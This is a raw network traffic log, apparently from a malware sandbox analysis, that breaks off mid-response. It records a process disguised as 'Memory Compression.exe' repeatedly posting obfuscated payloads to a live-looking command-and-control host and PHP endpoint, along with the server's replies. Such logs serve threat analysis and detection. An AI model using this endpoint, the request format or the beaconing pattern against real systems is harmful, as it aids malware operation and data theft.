                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5996&min_rtt=1471&rtt_var=9602&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=38753&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                35192.168.2.549956104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:04.137264013 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                36192.168.2.549962104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:04.322271109 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                37192.168.2.549964104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:04.720177889 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:05.064333916 CET1060OUTData Raw: 5a 53 58 5d 5f 5a 58 50 5c 5f 50 57 54 50 59 53 59 56 5b 5f 57 5e 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZSX]_ZXP\_PWTPYSYV[_W^TP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!'34?!([41Z$8^):>);/ 9:$Y"+&4!'#V=.^''P*1
                                                                                                                                Jan 11, 2025 15:03:05.189337969 CET25INHTTP/1.1 100 Continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                38192.168.2.549970104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:05.487133980 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:05.846750975 CET1060OUTData Raw: 5a 50 5d 5f 5f 5c 5d 50 5c 5f 50 57 54 5d 59 59 59 5c 5b 5e 57 52 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZP]__\]P\_PWT]YYY\[^WRT[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"& <1<#:]34]>9>>,Q#)9$/>V?6'54?=+.^''P*
                                                                                                                                Jan 11, 2025 15:03:05.950550079 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:06.191687107 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:06 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5kRFo7%2Fc5zQC7kmbOevx2zFu21lVf%2BXzu2u39vBkJj%2BqDajuoN1aTPOkdP59Hrm7dSwRJISIxlQV7Feif52mletnl6qQtKmJeNHdSJapD31HbUa0D%2FtzaHjktSy0oOo5YfeZrkf3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572c1ef2e7ced-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8435&min_rtt=2080&rtt_var=13491&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=27586&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                39192.168.2.549976104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:06.473417044 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:06.830018044 CET1060OUTData Raw: 5f 55 5d 54 5f 58 58 53 5c 5f 50 57 54 50 59 5b 59 57 5b 5a 57 55 54 5e 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _U]T_XXS\_PWTPY[YW[ZWUT^[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_104Y?"]!1$6$Y*)2> W 96T39+&7^"$7T)+.^''P*1
                                                                                                                                Jan 11, 2025 15:03:06.917296886 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:07.163800001 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:07 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ErvXaZ4yVwC1%2F1ld9A77dXSc071e4zA2fRKoORgr%2FRpwmNAPTZX9P9BUktBTU9hkHXxozkgVXoOhMKmUp4I7AhJNxVuP%2Ffy3enBjiO7f2cgEp3auVHu83sfYvJjcWvxlZl%2Bmpz8V"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572c7fb9e8cba-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2562&min_rtt=1989&rtt_var=1893&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=221985&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                40192.168.2.549982104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:07.294393063 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:07.642535925 CET1060OUTData Raw: 5f 57 5d 5b 5f 5c 5d 54 5c 5f 50 57 54 50 59 53 59 51 5b 5a 57 5f 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _W][_\]T\_PWTPYSYQ[ZW_T_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!&V,\+2+#W6\35,=_9)(,Q!9=$.S*6/^"'/T*.^''P*1
                                                                                                                                Jan 11, 2025 15:03:07.738647938 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:07.976903915 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:07 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AwB2e8jxFqzAGsfYo0QwtNCvTM%2BITF3J4jew3Eeyx4%2B3XN1btVFUwHpl0oIT4AwUXFeIFdMQkKgAocL6G8NA6qMQHYV6bZwILsYk1gXTvK7N8%2BrCJHLddMVTU5zuyBUOkNEqg11%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572cd187a429e-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4866&min_rtt=1811&rtt_var=6789&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=55614&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                41192.168.2.549988104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:08.115909100 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:08.470621109 CET1060OUTData Raw: 5a 52 5d 5e 5a 5b 58 55 5c 5f 50 57 54 52 59 52 59 5c 5b 51 57 52 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZR]^Z[XU\_PWTRYRY\[QWRT\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!Y2 X<([#!*_$%'>:=>+<V!**'Y"*54"Q8>;.^''P*
                                                                                                                                Jan 11, 2025 15:03:08.568403959 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:08.857074976 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:08 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wTkvMTLg1po5e45EVrIQDNHtzgqLx0%2BmmMnjGBmufcqdCyYoz7ci4agv%2F5fjRT1eX3FqbGiUh1OoQJU7D0kW%2F9h%2Fnt%2FOJmc9lCXF0k1z34MljzkhwKnHY1cLbX6OwTUrqxzVUuK%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572d24f015e76-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4780&min_rtt=1703&rtt_var=6794&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=55462&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                42192.168.2.549994104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:09.159554005 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                43192.168.2.549996104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:09.493308067 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:09.845612049 CET1776OUTData Raw: 5f 53 58 59 5f 52 58 54 5c 5f 50 57 54 57 59 53 59 52 5b 51 57 52 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _SXY_RXT\_PWTWYSYR[QWRTP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!%+( _ -0%,Y*)*+!9.S'<&W+,6+*.^''P*-
                                                                                                                                Jan 11, 2025 15:03:09.937393904 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:10.148396969 CET952INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:10 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=49zVTRk8r2Dn3LJ925%2F8MLt6%2BDVhnV8xhd3omSjw0Vg0djnPrRg5icWg34wgL7r7lG7jvIuYtJfiji3K2RWfm1CXhCO6YUX0TlUJOuR9mp%2FWa%2B2jPz8i4KBneRW9FTXUW6yWnlUR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572dadd0419b2-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1903&rtt_var=785&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2086&delivery_rate=666666&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 24 07 35 10 2e 1c 36 15 35 0d 3e 08 3b 1c 25 33 25 5b 2a 32 26 5d 26 38 20 10 2d 28 0e 53 23 2a 27 05 24 07 22 04 33 3e 3d 0e 3f 01 2c 5d 00 10 20 1c 30 1d 0b 5c 2d 32 31 50 28 22 3f 1d 23 3c 3c 06 27 16 3d 0e 37 23 3c 07 23 3d 2d 10 2e 22 34 0f 2d 24 31 02 2e 38 02 1e 34 0f 2b 55 00 14 20 50 27 3a 3f 07 3e 1d 38 51 20 01 3e 5a 24 3b 28 1e 29 02 2b 0f 28 3b 39 55 3c 3c 35 09 23 01 0b 12 3d 33 0a 44 24 32 00 0a 25 06 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98$5.65>;%3%[*2&]&8 -(S#*'$"3>=?,] 0\-21P("?#<<'=7#<#=-."4-$1.84+U P':?>8Q >Z$;()+(;9U<<5#=3D$2%!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                44192.168.2.550001104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:09.618639946 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:09.970829010 CET1060OUTData Raw: 5f 51 5d 55 5f 5d 58 54 5c 5f 50 57 54 56 59 52 59 53 5b 5e 57 55 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _Q]U_]XT\_PWTVYRYS[^WUT\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"2#(_?+ W6[00_?)1]=$U#5$Y>(&+"7*;.^''P*)
                                                                                                                                Jan 11, 2025 15:03:10.090790033 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:10.346745014 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:10 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DReA93ndocu5r2Mn9nPJuNCPNIAnIRqrC4cpG%2FUufSFoNWqF1Z1KN4Z41Q%2BPGTG0QPWT0uxw90jMPfdHqMt1TTLluPr%2F4VR%2BV1fWKzaPppCahhP%2F%2BqelhFIya9G%2BhglWwuRgdg72"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572dbcd12236a-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4617&min_rtt=1898&rtt_var=6150&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=61728&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a
                                                                                                                                Data Ascii: 4;W^Q
                                                                                                                                Jan 11, 2025 15:03:10.439196110 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                45192.168.2.550007104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:10.572150946 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:10.923770905 CET1060OUTData Raw: 5f 5e 5d 54 5f 5b 58 5c 5c 5f 50 57 54 50 59 58 59 57 5b 5a 57 54 54 58 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _^]T_[X\\_PWTPYXYW[ZWTTX[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!& <\<"<[4"34X=)%])?!**R'=+& 74*.^''P*1
                                                                                                                                Jan 11, 2025 15:03:11.044704914 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:11.295121908 CET809INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:11 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lExT%2Bo9R7r4%2F%2FhNFdS80GfGbHapnzorGAUzUZmpRsi31zp2w3EKa1z7FG9s%2Fgl2x%2FrDki4cJkXIc6LE5YQmxkVxBYNlG5z9RS0qPda7b7TB1Wt9lriYh%2FNwYuUJbQTOeUZr%2BLxgM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572e1b8628c36-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4618&min_rtt=1976&rtt_var=6026&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=63151&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                46192.168.2.550013104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:11.431705952 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:11.783353090 CET1060OUTData Raw: 5a 53 58 5d 5f 5d 5d 53 5c 5f 50 57 54 52 59 5a 59 55 5b 51 57 56 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZSX]_]]S\_PWTRYZYU[QWVT\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!^% ]+(Z#")'$=_*8 .V$,-?5' $7)+.^''P*
                                                                                                                                Jan 11, 2025 15:03:11.884176970 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:12.129563093 CET800INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:12 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
